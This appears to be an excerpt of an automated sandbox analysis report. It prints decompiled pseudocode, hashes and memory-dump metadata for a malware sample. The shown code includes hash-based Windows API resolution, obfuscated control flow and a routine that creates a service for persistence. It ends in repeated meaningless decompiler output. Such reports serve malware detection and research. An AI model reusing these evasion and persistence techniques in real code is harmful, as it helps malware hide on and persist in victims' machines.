                                                        0x003f7943
                                                        0x003f794b
                                                        0x003f7953
                                                        0x003f795f
                                                        0x003f796d
                                                        0x003f7971
                                                        0x003f7979
                                                        0x003f7981
                                                        0x003f7985
                                                        0x003f7985
                                                        0x003f7990
                                                        0x003f7990
                                                        0x003f7990
                                                        0x003f7990
                                                        0x003f7996
                                                        0x00000000
                                                        0x00000000
                                                        0x003f799c
                                                        0x003f7a86
                                                        0x003f7a88
                                                        0x003f7a8f
                                                        0x003f7aa2
                                                        0x003f7aa7
                                                        0x003f7aa7
                                                        0x003f7aac
                                                        0x003f7ab2
                                                        0x003f7ab9
                                                        0x003f7ac8
                                                        0x003f7aca
                                                        0x003f7acf
                                                        0x003f7ad4
                                                        0x003f7ae7
                                                        0x003f7aec
                                                        0x003f7aec
                                                        0x003f7af3
                                                        0x003f7af5
                                                        0x003f7afc
                                                        0x003f7b0f
                                                        0x003f7b14
                                                        0x003f7b14
                                                        0x003f7b1d
                                                        0x003f7b1f
                                                        0x00000000
                                                        0x003f79a2
                                                        0x003f79a8
                                                        0x003f7c1e
                                                        0x003f7c25
                                                        0x003f7c38
                                                        0x003f7c3d
                                                        0x003f7c3d
                                                        0x003f7c46
                                                        0x003f7c56
                                                        0x003f79ae
                                                        0x003f79b4
                                                        0x003f7a54
                                                        0x003f7a5a
                                                        0x003f7a64
                                                        0x003f7a66
                                                        0x003f7a69
                                                        0x003f7a6f
                                                        0x003f7a72
                                                        0x00000000
                                                        0x003f79ba
                                                        0x003f79c0
                                                        0x00000000
                                                        0x003f79c6
                                                        0x003f79c6
                                                        0x003f79cd
                                                        0x003f79e0
                                                        0x003f79e5
                                                        0x003f79e5
                                                        0x003f79ef
                                                        0x003f79f1
                                                        0x003f79fe
                                                        0x003f7a04
                                                        0x003f7a1c
                                                        0x003f7a1e
                                                        0x003f7a1e
                                                        0x003f7a3d
                                                        0x003f7a41
                                                        0x003f7a48
                                                        0x003f7a4a
                                                        0x003f7a4b
                                                        0x00000000
                                                        0x003f7a4b
                                                        0x003f79c0
                                                        0x003f79b4
                                                        0x003f79a8
                                                        0x00000000
                                                        0x003f799c
                                                        0x003f7b2f
                                                        0x003f7c14
                                                        0x00000000
                                                        0x003f7b35
                                                        0x003f7b3b
                                                        0x003f7b46
                                                        0x003f7b4b
                                                        0x003f7b51
                                                        0x003f7b55
                                                        0x003f7b6d
                                                        0x003f7b6f
                                                        0x003f7b6f
                                                        0x003f7b95
                                                        0x003f7b99
                                                        0x003f7b9b
                                                        0x003f7ba6
                                                        0x003f7bae
                                                        0x003f7bc1
                                                        0x003f7bc6
                                                        0x003f7bc6
                                                        0x003f7bcd
                                                        0x003f7bcf
                                                        0x003f7bd6
                                                        0x003f7be9
                                                        0x003f7bee
                                                        0x003f7bee
                                                        0x003f7bf7
                                                        0x003f7bf7
                                                        0x00000000
                                                        0x003f7b3b
                                                        0x00000000
                                                        0x003f7bf9
                                                        0x003f7bf9
                                                        0x003f7c13
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 1h$4aFc$GA$e+$~"M*$~2
                                                        • API String ID: 0-3245399214
                                                        • Opcode ID: 4b81312304fb4ae1cd31bd82a6558fe568e1d6c599fccc7a8ea3cab0a15ff691
                                                        • Instruction ID: fcd76d8c6ba9afd7803fd913276e5ad9ab05966737b5962d03396aac07a06e61
                                                        • Opcode Fuzzy Hash: 4b81312304fb4ae1cd31bd82a6558fe568e1d6c599fccc7a8ea3cab0a15ff691
                                                        • Instruction Fuzzy Hash: 52911771A0830A8BD716DF69C884A7F77EAABD4704F01092CF695DB265E770DE05CB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 65%
                                                        			E003F8970() {
                                                        				char _v520;
                                                        				intOrPtr _v524;
                                                        				intOrPtr _v576;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t11;
                                                        				intOrPtr* _t12;
                                                        				intOrPtr* _t15;
                                                        				void* _t20;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t32;
                                                        				intOrPtr _t35;
                                                        				intOrPtr _t41;
                                                        				intOrPtr* _t53;
                                                        				intOrPtr _t58;
                                                        				void* _t59;
                                                        				intOrPtr _t60;
                                                        				intOrPtr _t61;
                                                        				short* _t62;
                                                        				intOrPtr _t63;
                                                        				void* _t64;
                                                        				void* _t66;
                                                        				void* _t67;
                                                        
                                                        				_t64 =  &_v524;
                                                        				_t58 = 0;
                                                        				_t11 = 0x7c4f4b3;
                                                        				_v524 = 0;
                                                        				_t35 = _v524;
                                                        				_t63 = _v524;
                                                        				_t60 = _v524;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t66 = _t11 - 0x264c1972;
                                                        						if(_t66 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t66 == 0) {
                                                        							_t61 =  *0x3fe54c; // 0x55f0b0
                                                        							_t62 = _t61 + 0x260;
                                                        							while( *_t62 != 0x5c) {
                                                        								_t62 = _t62 + 2;
                                                        							}
                                                        							_t60 = _t62 + 2;
                                                        							_t11 = 0x1548988d;
                                                        							continue;
                                                        						} else {
                                                        							_t67 = _t11 - 0x1548988d;
                                                        							if(_t67 > 0) {
                                                        								if(_t11 != 0x1d74b649) {
                                                        									goto L24;
                                                        								} else {
                                                        									_t20 = E003F34C0(0x3fd940);
                                                        									_t53 =  *0x3fe158;
                                                        									_t59 = _t20;
                                                        									if(_t53 == 0) {
                                                        										_t53 = E003F3E60(_t35, E003F3F00(0xc6fbcd74), 0xba71dd03, _t63);
                                                        										 *0x3fe158 = _t53;
                                                        									}
                                                        									_t41 =  *0x3fe54c; // 0x55f0b0
                                                        									_t5 = _t41 + 0x260; // 0x55f310
                                                        									_t6 = _t41 + 0x18; // 0x55f0c8
                                                        									 *_t53( &_v520, 0x104, _t59, _t6, _t5);
                                                        									_t64 = _t64 + 0x14;
                                                        									E003F3460(_t59);
                                                        									_t58 = _v524;
                                                        									_t11 = 0x264c1972;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t67 == 0) {
                                                        									_t28 =  *0x3fe310;
                                                        									if(_t28 == 0) {
                                                        										_t28 = E003F3E60(_t35, E003F3F00(0x26f5757c), 0x9ba7cd1, _t63);
                                                        										 *0x3fe310 = _t28;
                                                        									}
                                                        									_t35 =  *_t28(0, 0, 0xf003f);
                                                        									if(_t35 == 0) {
                                                        										goto L37;
                                                        									} else {
                                                        										_t11 = 0x308961ad;
                                                        										continue;
                                                        									}
                                                        								} else {
                                                        									if(_t11 == 0x45d0fe6) {
                                                        										_t32 =  *0x3fe18c;
                                                        										if(_t32 == 0) {
                                                        											_t32 = E003F3E60(_t35, E003F3F00(0x26f5757c), 0x268fe5f0, _t63);
                                                        											 *0x3fe18c = _t32;
                                                        										}
                                                        										 *_t32(_t35);
                                                        										L37:
                                                        										return _t58;
                                                        									} else {
                                                        										if(_t11 != 0x7c4f4b3) {
                                                        											goto L24;
                                                        										} else {
                                                        											_t11 = 0x1d74b649;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L38:
                                                        					}
                                                        					if(_t11 == 0x2f0a6372) {
                                                        						_t12 =  *0x3fe18c;
                                                        						if(_t12 == 0) {
                                                        							_t12 = E003F3E60(_t35, E003F3F00(0x26f5757c), 0x268fe5f0, _t63);
                                                        							 *0x3fe18c = _t12;
                                                        						}
                                                        						 *_t12(_t63);
                                                        						goto L33;
                                                        					} else {
                                                        						if(_t11 == 0x308961ad) {
                                                        							_t15 =  *0x3fe404;
                                                        							if(_t15 == 0) {
                                                        								_t15 = E003F3E60(_t35, E003F3F00(0x26f5757c), 0xb4a05b4b, _t63);
                                                        								 *0x3fe404 = _t15;
                                                        							}
                                                        							_t63 =  *_t15(_t35, _t60, _t60, 2, 0x10, 2, 0,  &_v520, 0, 0, 0, 0, 0);
                                                        							if(_t63 == 0) {
                                                        								L33:
                                                        								_t11 = 0x45d0fe6;
                                                        							} else {
                                                        								_t58 = 1;
                                                        								_t11 = 0x3740ac4f;
                                                        								_v576 = 1;
                                                        							}
                                                        							goto L1;
                                                        						} else {
                                                        							if(_t11 != 0x3740ac4f) {
                                                        								goto L24;
                                                        							} else {
                                                        								E003F5040(_t35, _t63);
                                                        								_t11 = 0x2f0a6372;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L38;
                                                        					L24:
                                                        				} while (_t11 != 0xb646886);
                                                        				return _t58;
                                                        				goto L38;
                                                        			}


























                                                        0x003f8970
                                                        0x003f897a
                                                        0x003f897c
                                                        0x003f8981
                                                        0x003f8985
                                                        0x003f8989
                                                        0x003f898d
                                                        0x003f898d
                                                        0x003f8991
                                                        0x003f8991
                                                        0x003f8991
                                                        0x003f8991
                                                        0x003f8996
                                                        0x00000000
                                                        0x00000000
                                                        0x003f899c
                                                        0x003f8a7d
                                                        0x003f8a83
                                                        0x003f8a8d
                                                        0x003f8a90
                                                        0x003f8a93
                                                        0x003f8a99
                                                        0x003f8a9c
                                                        0x00000000
                                                        0x003f89a2
                                                        0x003f89a2
                                                        0x003f89a7
                                                        0x003f8a0d
                                                        0x00000000
                                                        0x003f8a13
                                                        0x003f8a18
                                                        0x003f8a1d
                                                        0x003f8a23
                                                        0x003f8a27
                                                        0x003f8a3f
                                                        0x003f8a41
                                                        0x003f8a41
                                                        0x003f8a47
                                                        0x003f8a4d
                                                        0x003f8a54
                                                        0x003f8a63
                                                        0x003f8a65
                                                        0x003f8a6a
                                                        0x003f8a6f
                                                        0x003f8a73
                                                        0x00000000
                                                        0x003f8a73
                                                        0x003f89a9
                                                        0x003f89a9
                                                        0x003f89c8
                                                        0x003f89cf
                                                        0x003f89e2
                                                        0x003f89e7
                                                        0x003f89e7
                                                        0x003f89f7
                                                        0x003f89fb
                                                        0x00000000
                                                        0x003f8a01
                                                        0x003f8a01
                                                        0x00000000
                                                        0x003f8a01
                                                        0x003f89ab
                                                        0x003f89b0
                                                        0x003f8b74
                                                        0x003f8b7b
                                                        0x003f8b8e
                                                        0x003f8b93
                                                        0x003f8b93
                                                        0x003f8b99
                                                        0x003f8b9b
                                                        0x003f8ba7
                                                        0x003f89b6
                                                        0x003f89bb
                                                        0x00000000
                                                        0x003f89c1
                                                        0x003f89c1
                                                        0x00000000
                                                        0x003f89c1
                                                        0x003f89bb
                                                        0x003f89b0
                                                        0x003f89a9
                                                        0x003f89a7
                                                        0x00000000
                                                        0x003f899c
                                                        0x003f8aab
                                                        0x003f8b43
                                                        0x003f8b4a
                                                        0x003f8b5d
                                                        0x003f8b62
                                                        0x003f8b62
                                                        0x003f8b68
                                                        0x00000000
                                                        0x003f8ab1
                                                        0x003f8ab6
                                                        0x003f8aea
                                                        0x003f8af1
                                                        0x003f8b04
                                                        0x003f8b09
                                                        0x003f8b09
                                                        0x003f8b2a
                                                        0x003f8b2e
                                                        0x003f8b6a
                                                        0x003f8b6a
                                                        0x003f8b30
                                                        0x003f8b30
                                                        0x003f8b35
                                                        0x003f8b3a
                                                        0x003f8b3a
                                                        0x00000000
                                                        0x003f8ab8
                                                        0x003f8abd
                                                        0x00000000
                                                        0x003f8abf
                                                        0x003f8ac3
                                                        0x003f8ac8
                                                        0x00000000
                                                        0x003f8ac8
                                                        0x003f8abd
                                                        0x003f8ab6
                                                        0x00000000
                                                        0x003f8ad2
                                                        0x003f8ad2
                                                        0x003f8ae9
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: rc/$rc/
                                                        • API String ID: 0-3664441713
                                                        • Opcode ID: 7b42b458cfc3df186973c533f6f3595f40f93d9351d57f3dc90d883c11b90b33
                                                        • Instruction ID: 5d550a95a43df7851e3ed2c6eda5cdcd00517e95392a9459339d92089da7bd93
                                                        • Opcode Fuzzy Hash: 7b42b458cfc3df186973c533f6f3595f40f93d9351d57f3dc90d883c11b90b33
                                                        • Instruction Fuzzy Hash: E45116B1B0830D47DB2A9B699885B7B339AEB90314F15482AF741CB352EF74DC018792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 66%
                                                        			E003F1C70(void* __ecx) {
                                                        				char _v4;
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				intOrPtr* _t67;
                                                        				signed int _t68;
                                                        				intOrPtr* _t74;
                                                        				signed int _t75;
                                                        				intOrPtr* _t77;
                                                        				int _t83;
                                                        				void* _t88;
                                                        				signed int _t90;
                                                        				signed int _t98;
                                                        				void* _t120;
                                                        				void* _t124;
                                                        				void* _t125;
                                                        				signed int _t127;
                                                        				signed int* _t128;
                                                        
                                                        				_t128 =  &_v12;
                                                        				_v12 = 0x1438;
                                                        				_v12 = _v12 + 0x196e;
                                                        				_v12 = _v12 >> 2;
                                                        				_v12 = _v12 | 0x4103c642;
                                                        				_v12 = _v12 ^ 0xedf17400;
                                                        				_v12 = _v12 | 0xf7eeecf7;
                                                        				_v12 = _v12 >> 1;
                                                        				_v12 = _v12 ^ 0x7fff7ff7;
                                                        				_v8 = 0xf51;
                                                        				_t124 = __ecx;
                                                        				_v8 = _v8 * 0x15;
                                                        				_v8 = _v8 ^ 0x8db737d8;
                                                        				_v8 = _v8 ^ 0x4633f7b0;
                                                        				_v8 = _v8 * 0x7e;
                                                        				_v8 = _v8 << 1;
                                                        				_v8 = _v8 + 0x7b9a;
                                                        				_v8 = _v8 ^ 0x576c4176;
                                                        				_t67 =  *0x3fde08;
                                                        				if(_t67 == 0) {
                                                        					_t67 = E003F3E60(_t88, E003F3F00(0x9bab0b12), 0xd8ef4c49, _t125);
                                                        					 *0x3fde08 = _t67;
                                                        				}
                                                        				_t68 =  *_t67();
                                                        				_v8 = 0x85c4;
                                                        				_t127 = _v12 + _t68 % _v8;
                                                        				_v8 = _v8 + 0xffffe6b2;
                                                        				_v8 = _v8 + 0xffff2952;
                                                        				_v8 = _v8 + 0xffffdb08;
                                                        				_v8 = 0x38e38e39 * _v8 >> 0x20 >> 1;
                                                        				_v8 = _v8 + 0xffffe3ba;
                                                        				_v8 = _v8 ^ 0x5caaf9ac;
                                                        				_v8 = _v8 ^ 0x40db6349;
                                                        				_v12 = 0xd311;
                                                        				_v12 = 0xaaaaaaab * _v12 >> 0x20 >> 4;
                                                        				_v12 = _v12 ^ 0x4a159b21;
                                                        				_v12 = _v12 ^ 0x4a1593fa;
                                                        				_t74 =  *0x3fde08;
                                                        				if(_t74 == 0) {
                                                        					_t74 = E003F3E60(_t88, E003F3F00(0x9bab0b12), 0xd8ef4c49, _t127);
                                                        					 *0x3fde08 = _t74;
                                                        				}
                                                        				_t75 =  *_t74();
                                                        				_t77 =  *0x3fde08;
                                                        				_t90 = _v8 + _t75 % _v12;
                                                        				if(_t77 == 0) {
                                                        					_t77 = E003F3E60(_t90, E003F3F00(0x9bab0b12), 0xd8ef4c49, _t127);
                                                        					 *0x3fde08 = _t77;
                                                        				}
                                                        				_v4 =  *_t77();
                                                        				if(_t127 != 0) {
                                                        					_t120 = _t124;
                                                        					_t98 = _t127 >> 1;
                                                        					_t124 = _t124 + _t127 * 2;
                                                        					_t83 = memset(_t120, 0x2d002d, _t98 << 2);
                                                        					asm("adc ecx, ecx");
                                                        					memset(_t120 + _t98, _t83, 0);
                                                        					_t128 =  &(_t128[6]);
                                                        				}
                                                        				E003F4EA0(_t124, _t90,  &_v4);
                                                        				 *((short*)(_t124 + _t90 * 2)) = 0;
                                                        				return 0;
                                                        			}






















                                                        0x003f1c70
                                                        0x003f1c73
                                                        0x003f1c7a
                                                        0x003f1c81
                                                        0x003f1c85
                                                        0x003f1c8c
                                                        0x003f1c93
                                                        0x003f1c9a
                                                        0x003f1c9d
                                                        0x003f1ca4
                                                        0x003f1cb4
                                                        0x003f1cb6
                                                        0x003f1cba
                                                        0x003f1cc2
                                                        0x003f1ccf
                                                        0x003f1cd3
                                                        0x003f1cd7
                                                        0x003f1cdf
                                                        0x003f1ce7
                                                        0x003f1cee
                                                        0x003f1d01
                                                        0x003f1d06
                                                        0x003f1d06
                                                        0x003f1d0b
                                                        0x003f1d1e
                                                        0x003f1d26
                                                        0x003f1d28
                                                        0x003f1d30
                                                        0x003f1d38
                                                        0x003f1d4d
                                                        0x003f1d51
                                                        0x003f1d59
                                                        0x003f1d61
                                                        0x003f1d69
                                                        0x003f1d7a
                                                        0x003f1d7e
                                                        0x003f1d86
                                                        0x003f1d8e
                                                        0x003f1d95
                                                        0x003f1da8
                                                        0x003f1dad
                                                        0x003f1dad
                                                        0x003f1db2
                                                        0x003f1dc0
                                                        0x003f1dc5
                                                        0x003f1dc9
                                                        0x003f1ddc
                                                        0x003f1de1
                                                        0x003f1de1
                                                        0x003f1de8
                                                        0x003f1dee
                                                        0x003f1df3
                                                        0x003f1df5
                                                        0x003f1df7
                                                        0x003f1dff
                                                        0x003f1e01
                                                        0x003f1e03
                                                        0x003f1e03
                                                        0x003f1e06
                                                        0x003f1e10
                                                        0x003f1e1a
                                                        0x003f1e24

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: vAlW
                                                        • API String ID: 0-571418455
                                                        • Opcode ID: 98e59f527fe249370f676ea23506fff1dabe25699a3604292945a53b29e244b7
                                                        • Instruction ID: 37849039de75fc98c7273d4d2cc539b841bf8217c918fae690d5a1f0c1b928db
                                                        • Opcode Fuzzy Hash: 98e59f527fe249370f676ea23506fff1dabe25699a3604292945a53b29e244b7
                                                        • Instruction Fuzzy Hash: 79415F716083469BC708EF79D84542FB7E6FBE0714F018D2DE5E18B264D7B49A05CB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E003F3F00(intOrPtr __ecx) {
                                                        				signed int _t92;
                                                        				intOrPtr* _t94;
                                                        				signed int _t95;
                                                        				signed int _t103;
                                                        				signed int _t108;
                                                        				signed short* _t109;
                                                        				intOrPtr* _t110;
                                                        				void* _t111;
                                                        
                                                        				_t94 =  *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc;
                                                        				 *((intOrPtr*)(_t111 + 0x18)) = __ecx;
                                                        				 *((intOrPtr*)(_t111 + 0x18)) = _t94;
                                                        				_t110 =  *_t94;
                                                        				if(_t110 == _t94) {
                                                        					L9:
                                                        					return 0;
                                                        				} else {
                                                        					do {
                                                        						_t109 =  *(_t110 + 0x30);
                                                        						 *(_t111 + 0x10) = 0x4090;
                                                        						 *(_t111 + 0x10) =  *(_t111 + 0x10) | 0x31656b5b;
                                                        						_t8 = _t111 + 0x10; // 0x31656b5b
                                                        						 *(_t111 + 0x10) =  *_t8 * 0x51;
                                                        						_t10 = _t111 + 0x10; // 0x31656b5b
                                                        						 *(_t111 + 0x10) = 0xb02c0b03 *  *_t10 >> 0x20 >> 6;
                                                        						 *(_t111 + 0x10) =  *(_t111 + 0x10) << 0x10;
                                                        						 *(_t111 + 0x10) =  *(_t111 + 0x10) | 0xecb0ddf8;
                                                        						 *(_t111 + 0x10) =  *(_t111 + 0x10) + 0x637e;
                                                        						 *(_t111 + 0x10) =  *(_t111 + 0x10) ^ 0xeef54176;
                                                        						 *(_t111 + 0x14) = 0x5ef;
                                                        						 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0x6fab;
                                                        						 *(_t111 + 0x14) =  *(_t111 + 0x14) | 0x1ac9183b;
                                                        						 *(_t111 + 0x14) =  *(_t111 + 0x14) << 8;
                                                        						 *(_t111 + 0x14) =  *(_t111 + 0x14) >> 2;
                                                        						 *(_t111 + 0x14) =  *(_t111 + 0x14) ^ 0x325f6ec6;
                                                        						 *(_t111 + 0x14) = 0xc1f4;
                                                        						 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0x1c7b;
                                                        						 *(_t111 + 0x14) =  *(_t111 + 0x14) | 0x28c630b6;
                                                        						 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0xffff17a2;
                                                        						 *(_t111 + 0x14) =  *(_t111 + 0x14) << 0xb;
                                                        						 *(_t111 + 0x14) =  *(_t111 + 0x14) ^ 0x30b50810;
                                                        						if( *_t109 != 0) {
                                                        							do {
                                                        								_t95 =  *(_t111 + 0x10);
                                                        								 *(_t111 + 0x14) = 0x5ef;
                                                        								 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0x6fab;
                                                        								 *(_t111 + 0x14) =  *(_t111 + 0x14) | 0x1ac9183b;
                                                        								 *(_t111 + 0x14) =  *(_t111 + 0x14) << 8;
                                                        								 *(_t111 + 0x14) =  *(_t111 + 0x14) >> 2;
                                                        								 *(_t111 + 0x14) =  *(_t111 + 0x14) ^ 0x325f6ec6;
                                                        								 *(_t111 + 0x14) = 0xc1f4;
                                                        								 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0x1c7b;
                                                        								 *(_t111 + 0x14) =  *(_t111 + 0x14) | 0x28c630b6;
                                                        								 *(_t111 + 0x14) =  *(_t111 + 0x14) + 0xffff17a2;
                                                        								 *(_t111 + 0x14) =  *(_t111 + 0x14) << 0xb;
                                                        								 *(_t111 + 0x14) =  *(_t111 + 0x14) ^ 0x30b50810;
                                                        								_t103 =  *(_t111 + 0x10) << ( *(_t111 + 0x14) & 0x000000ff);
                                                        								_t92 =  *_t109 & 0x0000ffff;
                                                        								_t108 =  *(_t111 + 0x10) << ( *(_t111 + 0x14) & 0x000000ff);
                                                        								if(_t92 >= 0x41 && _t92 <= 0x5a) {
                                                        									_t92 = _t92 + 0x20;
                                                        								}
                                                        								 *(_t111 + 0x10) = _t92;
                                                        								_t109 =  &(_t109[1]);
                                                        								 *(_t111 + 0x10) =  *(_t111 + 0x10) + _t103;
                                                        								 *(_t111 + 0x10) =  *(_t111 + 0x10) + _t108;
                                                        								 *(_t111 + 0x10) =  *(_t111 + 0x10) - _t95;
                                                        							} while ( *_t109 != 0);
                                                        							_t94 =  *((intOrPtr*)(_t111 + 0x18));
                                                        						}
                                                        						if(( *(_t111 + 0x10) ^ 0x14d5ed60) ==  *((intOrPtr*)(_t111 + 0x1c))) {
                                                        							return  *((intOrPtr*)(_t110 + 0x18));
                                                        						} else {
                                                        							goto L8;
                                                        						}
                                                        						goto L11;
                                                        						L8:
                                                        						_t110 =  *_t110;
                                                        					} while (_t110 != _t94);
                                                        					goto L9;
                                                        				}
                                                        				L11:
                                                        			}











                                                        0x003f3f0f
                                                        0x003f3f12
                                                        0x003f3f17
                                                        0x003f3f1b
                                                        0x003f3f1f
                                                        0x003f408d
                                                        0x003f4096
                                                        0x003f3f25
                                                        0x003f3f25
                                                        0x003f3f25
                                                        0x003f3f28
                                                        0x003f3f30
                                                        0x003f3f38
                                                        0x003f3f3d
                                                        0x003f3f46
                                                        0x003f3f4f
                                                        0x003f3f53
                                                        0x003f3f58
                                                        0x003f3f60
                                                        0x003f3f68
                                                        0x003f3f70
                                                        0x003f3f78
                                                        0x003f3f80
                                                        0x003f3f88
                                                        0x003f3f8d
                                                        0x003f3f92
                                                        0x003f3f9a
                                                        0x003f3fa2
                                                        0x003f3faa
                                                        0x003f3fb2
                                                        0x003f3fba
                                                        0x003f3fbf
                                                        0x003f3fcb
                                                        0x003f3fd1
                                                        0x003f3fd1
                                                        0x003f3fd5
                                                        0x003f3fdd
                                                        0x003f3fe5
                                                        0x003f3fed
                                                        0x003f3ff2
                                                        0x003f3ff7
                                                        0x003f4008
                                                        0x003f4010
                                                        0x003f4018
                                                        0x003f4020
                                                        0x003f4028
                                                        0x003f402d
                                                        0x003f4035
                                                        0x003f4040
                                                        0x003f4043
                                                        0x003f4048
                                                        0x003f404f
                                                        0x003f404f
                                                        0x003f4052
                                                        0x003f4056
                                                        0x003f4059
                                                        0x003f405d
                                                        0x003f4061
                                                        0x003f4065
                                                        0x003f406f
                                                        0x003f406f
                                                        0x003f4080
                                                        0x003f40a1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003f4082
                                                        0x003f4082
                                                        0x003f4085
                                                        0x00000000
                                                        0x003f3f25
                                                        0x00000000

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: [ke1
                                                        • API String ID: 0-815721638
                                                        • Opcode ID: 8272599f0f0b03f4253f631f8b357c0dbf329d74f1d4cc76f89a9bf9e32a1888
                                                        • Instruction ID: 7f42a4849270acd91b1bfe5225b6eef5b678400400d7f4f28240bec4dd227004
                                                        • Opcode Fuzzy Hash: 8272599f0f0b03f4253f631f8b357c0dbf329d74f1d4cc76f89a9bf9e32a1888
                                                        • Instruction Fuzzy Hash: 5841F3B28093468BD754DF14E68946BFBF0FB90B54F000D5DE5A1A6251D3B5CA4CCBA3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 81%
                                                        			E00406DA8(intOrPtr* __eax, signed int __ecx, signed int* __edi, void* __esi) {
                                                        				intOrPtr* _t67;
                                                        				intOrPtr* _t68;
                                                        				signed char _t70;
                                                        				void* _t85;
                                                        				void* _t92;
                                                        				signed int _t94;
                                                        				intOrPtr* _t96;
                                                        
                                                        				_t92 = __esi;
                                                        				_t69 = __ecx;
                                                        				asm("pushad");
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__ecx =  *__ecx + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *((intOrPtr*)(__eax + 0x25)) =  *((intOrPtr*)(__eax + 0x25)) + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
                                                        				 *__eax =  *__eax + __eax;
